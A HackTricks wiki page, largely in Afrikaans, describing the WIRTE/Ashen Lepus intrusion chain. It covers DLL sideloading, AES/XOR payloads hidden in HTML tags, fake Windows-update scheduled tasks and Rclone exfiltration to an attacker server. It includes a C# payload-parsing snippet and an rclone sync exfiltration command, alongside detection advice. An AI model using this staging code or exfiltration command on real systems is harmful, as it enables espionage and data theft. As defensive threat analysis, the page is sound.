Advanced DLL Side-Loading With HTML-Embedded Payload Staging
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Oorsig van Tradecraft
Ashen Lepus (aka WIRTE) het ’n herhaalbare patroon uitgebuit wat DLL sideloading, staged HTML payloads, en modulêre .NET backdoors aaneenskakel om in Midde-Oosterse diplomatieke netwerke te bly voortbestaan. Die tegniek is deur enige operateur herbruikbaar omdat dit staatmaak op:
- Archive-based social engineering: onskadelike PDFs instrueer teikens om ’n RAR-argief van ’n lêerdeelwebwerf af te laai. Die argief bundel ’n oortuigende dokumentkyker EXE, ’n kwaadwillige DLL met die naam van ’n vertroude biblioteek (bv.
netutils.dll,srvcli.dll,dwampi.dll,wtsapi32.dll), en ’n lokDocument.pdf. - DLL search order abuse: die slagoffer dubbelklik die EXE, Windows los die DLL-import vanaf die huidige gids op, en die kwaadwillige loader (AshenLoader) voer binne die vertroude proses uit terwyl die lok-PDF oopmaak om verdagtheid te voorkom.
- Living-off-the-land staging: elke latere fase (AshenStager → AshenOrchestrator → modules) word buite die skyf gehou totdat dit nodig is, gelewer as versleutelde blobs weggesteek binne andersins onskadelike HTML-antwoorde.
Multi-Stage Side-Loading Chain
- Decoy EXE → AshenLoader: die EXE side-loads AshenLoader, wat host recon uitvoer, dit met AES-CTR enkripteer, en dit POST binne ronddraaiende parameters soos
token=,id=,q=, ofauth=na API-agtige paaie (bv./api/v2/account). - HTML extraction: die C2 gee slegs die volgende fase prys wanneer die kliënt-IP na die teikengebied gegeolokaliseer word en die
User-Agentmet die implant ooreenstem, wat sandboxes frustreer. Wanneer die kontroles slaag, bevat die HTTP-lichaam ’n<headerp>...</headerp>-blob met die Base64/AES-CTR-versleutelde AshenStager-payload. - Second sideload: AshenStager word ontplooi saam met ’n ander wettige binêre wat
wtsapi32.dllimporteëer. Die kwaadwillige kopie wat in die binêre geïnjekteer is, haal meer HTML op en onttrek hierdie keer<article>...</article>om AshenOrchestrator te herwin. - AshenOrchestrator: ’n modulêre .NET-beheerder wat ’n Base64 JSON-konfigurasie decodeer. Die konfig se velde
tgenauword aangeheg/gehash tot die AES-sleutel, watxrkontsleutel. Die resulterende bytes dien as ’n XOR-sleutel vir elke module-blob wat daarna opgehaal word. - Module delivery: elke module word beskryf deur HTML-kommentaar wat die parser na ’n arbitrêre tag herlei, wat statiese reëls breek wat slegs na
<headerp>of<article>kyk. Modules sluit in persistence (PR*), uninstallers (UN*), reconnaissance (SN), screen capture (SCT), en file exploration (FE).
HTML Container Parsing Pattern
var tag = Regex.Match(html, "<!--\s*TAG:\s*<(.*?)>\s*-->").Groups[1].Value;
var base64 = Regex.Match(html, $"<{tag}>(.*?)</{tag}>", RegexOptions.Singleline).Groups[1].Value;
var aesBytes = AesCtrDecrypt(Convert.FromBase64String(base64), key, nonce);
var module = XorBytes(aesBytes, xorKey);
LoadModule(JsonDocument.Parse(Encoding.UTF8.GetString(module)));
Selfs as verdedigers ’n spesifieke element blokkeer of verwyder, hoef die operateur net die tag wat in die HTML-opmerking aangedui is te verander om lewering te hervat.
Crypto & C2 Hardening
- AES-CTR everywhere: huidige loaders bevat 256-bit sleutels plus nonces (bv.,
{9a 20 51 98 ...}) en voeg opsioneel ’n XOR-laag by deur strings soosmsasn1.dllvoor/na decryptie te gebruik. - Recon smuggling: geënumeerde data sluit nou Program Files-lyste in om hoë-waarde apps te identifiseer en word altyd versleuteld voordat dit die gasheer verlaat.
- URI churn: query parameters and REST paths draai tussen veldtogte (
/api/v1/account?token=→/api/v2/account?auth=), wat brose deteksies ongeldig maak. - Gated delivery: bedieners is geo-afgebaken en antwoord slegs op werklike implants. Nie-goedgekeurde kliënte ontvang onopvallende HTML.
Persistence & Execution Loop
AshenStager plaas geplande take wat as Windows-onderhoudsopdragte vermom is en via svchost.exe uitgevoer word, bv.:
C:\Windows\System32\Tasks\Windows\WindowsDefenderUpdate\Windows Defender UpdaterC:\Windows\System32\Tasks\Windows\WindowsServicesUpdate\Windows Services UpdaterC:\Windows\System32\Tasks\Automatic Windows Update
Hierdie take herbegin die sideloading chain by opstart of op intervalle, wat verseker dat AshenOrchestrator vars modules kan versoek sonder om weer die skyf aan te raak.
Using Benign Sync Clients for Exfiltration
Operateurs plaas diplomatieke dokumente in C:\Users\Public (openlik leesbaar en nie-verdagtig) via ’n toegewyde module, en laai dan die legitieme Rclone binary af om daardie gids met aanvallerberging te sinkroniseer:
- Stage: kopieer/versamel teikendokumente in
C:\Users\Public\{campaign}\. - Configure: stuur ’n Rclone-konfigurasie wat na ’n aanvaller-beheerde HTTPS-endpoint wys (bv.,
api.technology-system[.]com). - Sync: run
rclone sync "C:\Users\Public\campaign" remote:ingest --transfers 4 --bwlimit 4M --quietsodat die verkeer soos normale cloud backups lyk.
Omdat Rclone wyd gebruik word vir wettige rugsteunwerkvloei, moet verdedigers fokus op anomalieë in uitvoering (nuwe binaries, vreemde remotes, of skielike sinkronisering van C:\Users\Public).
Detection Pivots
- Waarsku op signed processes wat onverwags DLLs vanaf gebruikers-wysigbare paaie laai (Procmon filters +
Get-ProcessMitigation -Module), veral wanneer die DLL-name oorvleuel metnetutils,srvcli,dwampi, ofwtsapi32. - Inspekteer verdagte HTTPS-antwoorde vir groot Base64-blokke ingebed binne ongebruiklike tags of beveilig deur
<!-- TAG: <xyz> -->opmerkings. - Jaag na geplande take wat
svchost.exemet nie-diens-argumente uitvoer of terugwys na dropper-gidse. - Monitor vir Rclone binaries wat buite IT-beheerde plekke verskyn, nuwe
rclone.conf-lêers, of sinkjobs wat vanaf staging-gidse soosC:\Users\Publictrek.
References
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.


